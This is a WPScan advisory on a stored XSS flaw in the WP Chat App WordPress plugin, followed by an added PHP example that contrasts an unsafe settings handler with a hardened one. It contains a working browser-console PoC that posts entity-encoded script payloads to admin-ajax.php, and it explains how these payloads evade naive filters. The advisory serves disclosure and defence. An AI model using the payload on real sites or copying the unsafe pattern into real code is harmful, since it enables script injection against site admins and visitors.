Source: wpvulndb (wpscan.com)
Author: Krugov Aryom
WPVDB-ID: 46ADA0B4-F3CD-44FB-A568-3345E639BDB6
Published: Jun 06, 2024 - 12:00 a.m.

WP Chat App < 3.6.5 - Admin+ Stored XSS

Source: wpscan.com
Tags: wordpress, chat app, stored xss, admin, cross-site scripting

AI Score: 5.2 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example on multisite installs, where only super admins hold it, or where DISALLOW_UNFILTERED_HTML is set).

PoC

1. Log in as an administrator and navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget
2. Paste and run the following in the browser console. The nonce is read from the page-global njt_wa object; note that the payload values are submitted HTML-entity-encoded (%26lt%3B is &lt;), so a filter that only looks for a literal < will pass them:

   await fetch("/wp-admin/admin-ajax.php", {
     "credentials": "include",
     "headers": { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" },
     "body": "title=%26lt%3Bscript%26gt%3Balert(/XSS-Text/)%26lt%3B%2Fscript%26gt%3B"
       + "&isShowBtnLabel=on"
       + "&btnLabel=%26lt%3Bscript%26gt%3Balert(/XSS-Label/)%26lt%3B%2Fscript%26gt%3B"
       + "&btnLabelWidth=156&textColor=%23fff&titleSize=18&descriptionTextSize=12&accountNameSize=14&regularTextSize=11"
       + "&backgroundColor=%232db742&btnPosition=right&btnLeftDistance=30&btnRightDistance=30&btnBottomDistance=30"
       + "&isShowPoweredBy=on&scrollHeight=500"
       + "&responseText=The+team+typically+replies+in+a+few+minutes."
       + "&description=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E"
       + "&gdprContent=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation."
       + "&time_symbols%5BhourSymbol%5D=h&time_symbols%5BminSymbol%5D=m"
       + "&showOnDesktop=on&showOnMobile=on&displayCondition=showAllPage"
       + "&action=njt_wa_save_design_setting&nonce=" + njt_wa["nonce"],
     "method": "POST",
     "mode": "cors"
   });

3. Refresh the page and open the "Design" tab: the XSS triggers when typing anything into either the "Widget Text" or "Widget Label Text" field.
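The description says the settings are neither sanitised on save nor escaped on output, and the PoC shows that the saved values are later injected into the Design tab's form. The following is an added example, not code from the WP Chat App plugin, showing that unsafe pattern beside a hardened one in the style of a WordPress admin-ajax handler. The option name njt_example_design, the function names, the capability choice and the field set are all assumptions made for illustration; they are not the plugin's real identifiers.

```php
<?php
// Added example (not the plugin's own code). Option name, function names
// and field names are hypothetical.

// --- Unsafe: stores whatever the request carries and prints it raw.
function njt_example_save_unsafe() {
    $settings = array(
        'title'    => wp_unslash( $_POST['title'] ),
        'btnLabel' => wp_unslash( $_POST['btnLabel'] ),
    );
    update_option( 'njt_example_design', $settings );
    wp_send_json_success();
}

function njt_example_render_unsafe() {
    $s = get_option( 'njt_example_design', array() );
    // Attribute context without esc_attr() and text context without esc_html():
    // a stored "><script>... breaks out of the input and executes.
    echo '<input name="title" value="' . $s['title'] . '">';
    echo '<span class="label">' . $s['btnLabel'] . '</span>';
}

// --- Hardened: nonce + capability check, sanitise on write, escape on read.
function njt_example_save_hardened() {
    // Rejects requests whose "nonce" field does not match the expected action.
    check_ajax_referer( 'njt_example_design', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $settings = array(
        // Plain-text fields: strip tags entirely.
        'title'       => sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) ),
        'btnLabel'    => sanitize_text_field( wp_unslash( $_POST['btnLabel'] ?? '' ) ),
        // Fields that legitimately carry markup (<strong>, <a href>): keep only
        // the post-safe tag set. wp_kses_post() never admits <script> or event
        // handler attributes, regardless of whether the user has unfiltered_html.
        'description' => wp_kses_post( wp_unslash( $_POST['description'] ?? '' ) ),
    );
    update_option( 'njt_example_design', $settings );
    wp_send_json_success();
}

function njt_example_render_hardened() {
    $defaults = array( 'title' => '', 'btnLabel' => '', 'description' => '' );
    $s = wp_parse_args( get_option( 'njt_example_design', array() ), $defaults );
    // Escape for the context each value lands in. An entity-encoded payload
    // such as &lt;script&gt; becomes &amp;lt;script&amp;gt; and renders as text.
    echo '<input name="title" value="' . esc_attr( $s['title'] ) . '">';
    echo '<span class="label">' . esc_html( $s['btnLabel'] ) . '</span>';
    echo '<p class="desc">' . wp_kses_post( $s['description'] ) . '</p>';
}
```

Two points follow from the PoC. First, the payload arrives as &lt;script&gt; rather than <script>, so a save-time filter that only rejects literal angle brackets is not a fix; output-time escaping for the actual context (esc_attr for attributes, esc_html for text, wp_kses_post for intentionally rich fields) is what closes the hole. Second, the XSS fires when the admin types into the Design tab, which points at client-side code re-rendering the stored value; any such preview must assign the value with textContent or the framework's escaped binding, never innerHTML.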

CPE
Name: (not given) | Operator: eq | Version: 3.6.5
Fixed in: 3.6.5 (versions before 3.6.5 affected, per the title)

